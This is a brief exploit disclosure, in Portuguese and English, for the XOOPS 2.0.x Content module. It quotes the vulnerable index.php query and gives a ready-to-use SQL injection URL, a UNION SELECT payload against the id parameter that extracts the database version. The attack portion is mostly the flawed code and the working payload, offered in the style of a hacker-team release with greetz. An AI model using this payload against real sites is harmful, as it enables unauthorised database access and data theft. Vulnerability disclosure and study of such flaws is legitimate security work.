|
Por Marcelo Almeida (Vympel)
|
|
04 de dezembro de 2009 |
# Arquivo com falha em index.php :
#
#
# $id = isset($HTTP_GET_VARS['id']) ? intval($HTTP_GET_VARS['id']) : 0;
#
# if ($id != 0) {
# $result = $xoopsDB->queryF("SELECT storyid, title, text, visible, nohtml,
nosmiley, nobreaks, # nocomments, link, address FROM
".$xoopsDB->prefix(_MIC_CONTENT_PREFIX)." WHERE #storyid=$id");
#
[+]Xoops 2.0.x Module Content
[+]Donwload of
Module:http://prdownloads.sourceforge.net/xoops/XOOPS2_mod_content-0.5.zip?
download
[+]Author: s4r4d0
[+]mail:
Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo
[+]TEAM: Fatal Error
[+]Bug: Sql injection and Blind sql found in index.php
[+]Exploit:http://www.site.com/modules/content/index.php?id=-1+UNION+SELECT
+1,2,3,@@version,5,6,7,8,9,10,11--
[+]Greetz: Elemento_pcx - z4i0n - ir4 - sp3x - D3UX - veryn e Vympel
[+]Made in BRazil
|